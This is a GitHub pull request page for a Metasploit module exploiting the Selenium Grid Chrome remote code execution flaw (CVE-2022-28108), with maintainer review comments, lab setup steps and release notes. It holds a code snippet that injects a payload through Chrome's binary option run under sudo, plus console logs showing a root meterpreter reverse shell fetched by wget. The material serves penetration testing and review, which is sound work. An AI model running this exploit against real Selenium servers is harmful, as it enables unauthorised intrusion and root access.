Add Selenium Chrome RCE module (CVE-2022-28108) #19769
Merged
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Takahiro-Yoko
changed the title
bcoles
reviewed
Dec 28, 2024
modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
Outdated
Show resolved
Hide resolved
| 'browserName' => 'chrome', | ||
| 'goog:chromeOptions' => { | ||
| 'binary' => '/usr/bin/python3', | ||
| 'args' => ["-cimport os; os.system('sudo su root -c \"#{payload.encoded}\"')"] |
There was a problem hiding this comment.
Presumably this will fail unless the user running Selenium can elevate to root (without a password)?
Obtaining a low-privileged shell is likely to be a more robust approach. If the user has permission to elevate privileges with passwordless sudo, the operator can elevate their session themselves.
There was a problem hiding this comment.
Thanks!
When using this exploit against the official Selenium Docker image, we need to elevate to root (which can be done without a password) for the exploit to succeed. The normal seluser may not have the necessary permissions to execute the payload. However, this isn't always the case, so I added a check to determine whether the user can elevate to root without a password. 9bfccc4 Does this approach seem acceptable?
modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
Outdated
Show resolved
Hide resolved
* add check if sudo without password possible * base64 encode payload
bcoles
reviewed
Dec 28, 2024
modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
Outdated
Show resolved
Hide resolved
…_28108.rb Improve version detection messaging Co-authored-by: bcoles <[email protected]>
* enable fetch_delete * avoid using single quotes * update doc
dledda-r7
requested changes
Jan 3, 2025
There was a problem hiding this comment.
Hello @Takahiro-Yoko, Thanks for your module!
I've left couple of comments for some minor code changes.
The exploit works great!
msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > show options
Module options (exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.ht
ml
RPORT 4444 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
FETCH_COMMAND WGET yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
FETCH_DELETE true yes Attempt to delete the binary after execution
FETCH_FILENAME ihlWIMji no Name to use on remote system when storing payload; cannot contain spaces or slashes
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_SRVPORT 8080 yes Local port to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain spaces
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Linux Command
View the full module info with the info, or info -d command.
msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > set lport 4445
lport => 4445
msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > set rhost 172.26.172.131
rhost => 172.26.172.131
msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > set lhost 172.26.172.131
lhost => 172.26.172.131
msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > exploit
[*] Started reverse TCP handler on 172.26.172.131:4445
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable.
[*] Meterpreter session 1 opened (172.26.172.131:4445 -> 172.17.0.2:34320) at 2025-01-03 09:56:34 -0500
meterpreter >
modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
Outdated
Show resolved
Hide resolved
Comment on lines
71
to
83
| if res&.code != 200 | ||
| res = send_request_cgi({ | ||
| 'method' => 'GET', | ||
| 'uri' => normalize_uri(target_uri.path, 'status') | ||
| }) | ||
| if res && res.get_json_document && res.get_json_document.include?('value') && | ||
| res.get_json_document['value'].include?('message') && | ||
| res.get_json_document['value']['message'].downcase.include?('selenium grid') | ||
| return Exploit::CheckCode::Detected('Selenium Grid version 4.x detected.') | ||
| end | ||
|
|
||
| return Exploit::CheckCode::Unknown | ||
| end |
There was a problem hiding this comment.
You can avoid the code nesting doing something like like this:
return Exploit::CheckCode::Detected('Selenium Grid version 4.x detected.') if res && res.get_json_document &&
res.get_json_document.include?('value') &&
res.get_json_document['value'].include?('message') &&
res.get_json_document['value']['message'].downcase.include?('selenium grid')
return Exploit::CheckCode::Unknown('Unexpected server reply.') unless res&.code == 200
modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
Outdated
Show resolved
Hide resolved
modules/exploits/linux/http/selenium_greed_chrome_rce_cve_2022_28108.rb
Outdated
Show resolved
Hide resolved
Co-authored-by: Diego Ledda <[email protected]>
|
Thank you for reviewing! I've applied your suggestions, updated the check to avoid code nesting, and retested. selenium/standalone-chrome:3.141.59 installed with Docker on Ubuntu 24.04selenium/standalone-chrome:4.0.0-alpha-6-20200730 installed with Docker on Ubuntu 24.04 |
Takahiro-Yoko
added a commit
to Takahiro-Yoko/metasploit-framework
that referenced
this pull request
Jan 4, 2025
Takahiro-Yoko
added a commit
to Takahiro-Yoko/metasploit-framework
that referenced
this pull request
Jan 4, 2025
* add timeout option * print session info * apply suggestions (rapid7#19769)
dledda-r7
approved these changes
Jan 6, 2025
There was a problem hiding this comment.
Looks good! Thanks @Takahiro-Yoko!
msf6 exploit(linux/http/selenium_greed_chrome_rce_cve_2022_28108) > exploit
[*] Started reverse TCP handler on 172.22.186.63:4445
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 3.141.59 detected, which is vulnerable.
[*] Meterpreter session 1 opened (172.22.186.63:4445 -> 172.17.0.2:49588) at 2025-01-06 07:55:06 -0500
meterpreter > sysinfo
Computer : 172.17.0.2
OS : Ubuntu 20.04 (Linux 6.11.2-amd64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: root
meterpreter >
|
@Takahiro-Yoko, FYI I just removed the PAYLOAD set from the DefaultOptions, it was working fine with the automatic selection from Metasploit but noted that you tested with that one! |
Release NotesThis adds an exploit module for Selenium Server (Grid) allowing unauthenticated command injection using Chrome backend. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
One of #19753
Firefox PR: #19771
File read PR: #19781
Vulnerable Application
Selenium Server (Grid) before 4.0.0-alpha-7 allows CSRF because it permits non-JSON content types
such as application/x-www-form-urlencoded, multipart/form-data, and text/plain.
The vulnerability affects:
This module was successfully tested on:
Installation
docker pull selenium/standalone-chrome:3.141.59docker run -d -p 4444:4444 -p 7900:7900 --shm-size="2g" selenium/standalone-chrome:3.141.59Verification Steps
use exploit/linux/http/selenium_greed_chrome_rce_cve_2022_28108run lhost=<lhost> rhost=<rhost>Options
Scenarios